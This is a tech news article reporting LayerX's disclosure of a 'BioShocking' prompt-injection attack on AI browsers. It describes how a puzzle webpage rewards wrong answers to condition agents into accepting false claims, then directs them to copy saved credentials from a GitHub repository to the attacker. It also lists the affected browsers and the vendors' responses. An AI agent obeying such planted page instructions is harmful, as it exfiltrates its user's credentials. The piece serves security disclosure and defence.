Security researchers trick AI browsers into revealing passwords using BioShock-inspired prompt injection

Named after BioShock's 'Would you kindly' mechanic, the attack trains AI agents to accept false information before stealing saved credentials.

Security researchers trick AI browsers into revealing passwords using BioShock-inspired prompt injection
Comment IconFacebook IconX IconReddit Icon
Tech Reporter
Published
1 minute & 30 seconds read time
TL;DR: Security researchers at LayerX revealed a BioShock-inspired prompt injection attack that tricks AI browsers into revealing saved passwords by training them to accept false information. Tested on six AI browsers, only OpenAI fixed it fully. LayerX advises user prompts before accessing signed-in accounts to prevent credential theft.
Voice: Hassam Nasir
0:00 / 2:45
Use left and right arrow keys to seek audio.

Security researchers at LayerX have discovered a new prompt injection technique that tricks AI browsers into revealing saved passwords and login credentials by leading them to believe they are playing a game.

The attack is called BioShocking, named after the 2007 video game BioShock. The game follows a brainwashed character who follows commands after hearing the phrase "Would you kindly?" That is pretty much what's going on here. Essentially, the AI agent believes whatever information it is given, and changing the information changes what it will do.

The attack starts on a malicious webpage designed as a puzzle called Rapture Games, themed after BioShock's underwater world. The puzzle rewards wrong answers, training the agent to accept that 2+2=5 and that incorrect actions are the winning move. Once the agent learns this, its safety protections stop working. The last step of the puzzle tells the agent to navigate to a GitHub repository and copy the login details stored there.

Security researchers trick AI browsers into revealing passwords using BioShock-inspired prompt injection 2

ChatGPT Atlas, Perplexity's Comet, Fellou, Genspark Browser, Sigma Browser, and Anthropic's Claude Chrome extension all copied real credentials and passed them to the attacker. LayerX used a controlled test environment with a plaintext file, but the same technique could point an agent at any resource it can reach in that session, including open tabs, signed-in accounts, and internal company tools.

LayerX notified all six vendors between October 2025 and January 2026. OpenAI is the only vendor to have implemented a working fix in ChatGPT Atlas. Anthropic attempted a patch for its Claude extension, but LayerX says it did not hold. Perplexity closed the report without acting on it, while Fellou, Genspark, and Sigma did not respond.

Security researchers trick AI browsers into revealing passwords using BioShock-inspired prompt injection 1

Frequently Asked Questions

TweakBot answers common questions about this news using TweakTown's own coverage from this page and related content from our archive. Tap a question to reveal the answer, or type your own below.

Question #1

Which AI browsers and extensions were shown to be vulnerable to the BioShocking prompt injection in LayerX's tests?

Click to reveal answer
Question #2

What specific sequence of actions in the Rapture Games puzzle allows the agent's safety protections to be bypassed?

Click to reveal answer
Question #3

How did LayerX validate that credentials were exfiltrated during their controlled tests?

They used a controlled test environment where the AI agents were directed to a plaintext file containing login details on a GitHub repository. During those tests ChatGPT Atlas, Perplexity's Comet, Fellou, Genspark Browser, Sigma Browser, and Anthropic's Claude Chrome extension all copied the real credentials from that plaintext file and passed them to the attacker.
Answered
Question #4

What mitigation did OpenAI implement in ChatGPT Atlas that LayerX considered a working fix?

Click to reveal answer

Have a question not listed here? Ask below and TweakBot will answer it.

LayerX recommends that AI browsers prompt users before reading from signed-in accounts. Something as simple as "I am about to copy data from your GitHub repository, continue?" would break the chain entirely. Until that becomes standard, agent mode is effectively another account with reach into everything you are signed in to.

Photo of the PlayStation DualSense Wireless Controller

Best Deals: PlayStation DualSense Wireless Controller

Prices last scanned 2 hours and 19 minutes ago

* Prices may be inaccurate. As an Amazon Associate, we earn from qualifying purchases. We earn affiliate commission from any Newegg or PCCG sales.

News Source:layerxsecurity.com

Tech Reporter

Email IconX IconLinkedIn Icon

Hassam is a veteran tech journalist and editor with over eight years of experience embedded in the consumer electronics industry. His obsession with hardware began with childhood experiments involving semiconductors, a curiosity that evolved into a career dedicated to deconstructing the complex silicon that powers our world. From benchmarking PC internals to stress-testing flagship CPUs and GPUs, Hassam specializes in translating high-level engineering into deep, unbiased insights for the enthusiast community.

Stay Updated

Follow TweakTown for breaking tech news, reviews, and daily updates.

Add TweakTown as a preferred source on GoogleFind TweakTown on Apple News
Newsletter Subscription